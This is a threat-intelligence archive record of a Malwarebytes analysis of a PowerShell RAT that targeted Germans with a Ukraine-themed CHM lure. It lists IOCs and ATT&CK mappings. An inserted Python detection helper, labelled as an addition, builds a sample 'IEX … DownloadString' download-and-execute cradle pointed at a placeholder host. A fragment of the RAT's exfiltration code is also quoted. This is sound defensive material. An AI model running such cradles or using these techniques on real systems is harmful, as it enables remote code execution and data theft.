{
	"id": "9a605052-3625-4de2-ba7a-0c982dc4c5ba",
	"created_at": "2026-04-06T00:17:08.173088Z",
	"updated_at": "2026-04-10T13:11:39.459288Z",
	"deleted_at": null,
	"sha1_hash": "6c5771fa7956dd19a71a1a7e8cdc00986996a047",
	"title": "Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 877341,
	"plain_text": "Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis\r\nBy Mark Stockley\r\nPublished: 2022-05-15 · Archived: 2026-04-05 15:31:51 UTC\r\nThis blog post was authored by Hossein Jazi and Jérôme Segura\r\nPopulations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and with events unfolding on a daily basis, people are hungry for information.\r\nAlthough all countries have reasons to be concerned, the situation in Germany is more complicated than most. It is one of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it struggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania, further increasing economic tensions.\r\nThis week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. 
The downloaded document is in fact a decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.\r\nDecoy site lures victims with Ukraine situation\r\nThreat actors registered an expired German domain name at collaboration-bw[.]de that was formerly used as a collaboration platform to develop new ideas for the Baden-Württemberg state.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 1 of 9\r\nThe threat actors used the domain to host a website that looked like the official Baden-Württemberg website, baden-wuerttemberg.de.\r\nWith this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download: a file tantalisingly called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.\r\nAn English translation of the page reads:\r\nImportant, current threat situation regarding the Ukraine crisis\r\nOn this website you will always find\r\nFile analysis\r\nThe archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named 2022-Q2-Bedrohungslage-Ukraine.chm. 
The CHM format is Microsoft’s HTML Help file format, which consists of a number of compiled HTML files.\r\nVictims will get a fake error message when they open that file, while PowerShell quietly runs a Base64-encoded command.\r\nAfter de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).\r\nThe downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.\r\nFinally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute it each day at a specific time.\r\nPowerShell RAT (Status.txt)\r\nStatus.txt is a RAT written in PowerShell (this RAT is a modified version of an HTTP reverse shell that is available on GitHub). It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. 
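Added example, not from the Malwarebytes write-up or from the RAT itself: a Python triage helper for the kind of Base64 command the CHM hands to PowerShell. PowerShell’s -EncodedCommand argument is Base64 over UTF-16LE text, not UTF-8, so a naive decode produces interleaved NUL bytes; the helper decodes it the way PowerShell does, accepts the short prefixes PowerShell allows (-e, -ec, -enc), rejects arguments that are not valid Base64 of UTF-16LE text, and flags download-cradle markers such as IEX and DownloadString in whatever ends up executing. The sample command line is constructed here and the stager URL in it is a placeholder; the write-up does not publish the real command line.

```python
# Added example: decode a PowerShell -EncodedCommand argument the way
# PowerShell does (Base64 over UTF-16LE) and flag download-cradle markers.
# Not taken from the write-up; the sample command line below is constructed.
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
# The argument itself is Base64 alphabet only; 16+ chars keeps out tiny false hits.
ENC_ARG = re.compile(r'(?i)(?:^|[ ])-e(?:c|n[codedmand]*)?[ ]+([A-Za-z0-9+/=]{16,})')

# Substrings that mark a download-and-execute cradle (compared lower-cased).
CRADLE_MARKERS = (
    'iex', 'invoke-expression', 'downloadstring', 'net.webclient',
    'invoke-webrequest', 'frombase64string',
)


def decode_encoded_command(cmdline):
    # Return the plaintext script behind -EncodedCommand, or None if the command
    # line has none or the argument is not valid Base64 of UTF-16LE text.
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode('utf-16le')
    except (binascii.Error, UnicodeDecodeError):
        return None


def cradle_markers(text):
    # List the cradle markers present in text, in CRADLE_MARKERS order.
    low = text.lower()
    return [k for k in CRADLE_MARKERS if k in low]


def triage(cmdline):
    # Decode if encoded, then look for cradle markers in what actually executes.
    script = decode_encoded_command(cmdline)
    if script is None:
        return {'encoded': False, 'script': None, 'markers': cradle_markers(cmdline)}
    return {'encoded': True, 'script': script, 'markers': cradle_markers(script)}


# Constructed sample modelled on the IEX cradle the write-up describes. The URL is a
# placeholder: neither the stager URL nor the real command line is in the write-up.
SAMPLE_SCRIPT = '''IEX (New-Object Net.WebClient).DownloadString('https://stager.example.invalid/s.txt')'''


def build_sample_cmdline(script=SAMPLE_SCRIPT):
    # Encode the way a loader would: UTF-16LE, then Base64, passed behind -enc.
    b64 = base64.b64encode(script.encode('utf-16le')).decode('ascii')
    return 'powershell.exe -NoP -W Hidden -enc ' + b64


if __name__ == '__main__':
    for line in (build_sample_cmdline(),
                 'powershell.exe -ExecutionPolicy Bypass -File report.ps1'):
        print(triage(line))
```

Run against process-creation telemetry, the decoded script is what you want to alert on and pivot from (the domain it fetches from, the path it writes to); the raw Base64 blob is unique per build and useless as a signature.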
The RAT also builds a unique id for the victim, the clientid.\r\nThis data is exfiltrated as a JSON data structure sent to the server via a POST request:\r\n$json='{ \"type\": \"newclient\", \"result\": \"\", \"pwd\": \"' + $pwd_b64 + '\", \"cuser\": \"' + $cuser + '\", \"ho\r\nHowever, before executing this request the script will first bypass the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass. It is decrypted using a generated key and IV before execution.\r\nThis RAT has the following capabilities:\r\nDownload (type: D0WNl04D): download files from the server\r\nUpload (type: UPL04D): upload a file to the server\r\nLoadPS1 (type: L04DPS1): load and execute a PowerShell script\r\nCommand (type: C0MM4ND): execute a specific command\r\nGerman command and control server\r\nThe attack was thoughtfully carried out, even ensuring that the stolen data was sent to a German domain name, kleinm[.]de, to avoid suspicion.\r\nIt is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.\r\nThe Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the war in Ukraine while ensuring our customers are protected.\r\nIndicators of Compromise (IOCs)\r\nPhishing 
site\r\ncollaboration-bw[.]de/bedrohung-ukr.html\r\nLure\r\n2022-Q2-Bedrohungslage-Ukraine.zip\r\n2430f68285120686233569e51e2147914dc87f82c7dbdf07fe0c34dbb1aca77c\r\n2022-Q2-Bedrohungslage-Ukraine.chm\r\n80bad7e0d5a5d2782674bb8334dcca03534aa831c37aebb5962da1cd1bec4130\r\nStatus.txt\r\na5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f\r\nMonitorHealth.cmd\r\nfc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd\r\nC2\r\nkleinm[.]de\r\nMITRE ATT&CK\r\nTactic | ID | Name | Description\r\nExecution | T1059 | Command and Scripting Interpreter | Starts cmd.exe to run hh.exe; executes PowerShell script to download and execute a script\r\nPersistence | T1053 | Scheduled Task/Job | Executes task scheduler to add MonitorHealth.cmd as a daily task\r\nDefense evasion | T1222 | File and Directory Permissions Modification | Uses attrib.exe to hide SecuriyHealthService folder\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/"
	],
	"report_names": [
		"custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434628,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c5771fa7956dd19a71a1a7e8cdc00986996a047.pdf",
		"text": "https://archive.orkl.eu/6c5771fa7956dd19a71a1a7e8cdc00986996a047.txt",
		"img": "https://archive.orkl.eu/6c5771fa7956dd19a71a1a7e8cdc00986996a047.jpg"
	}
}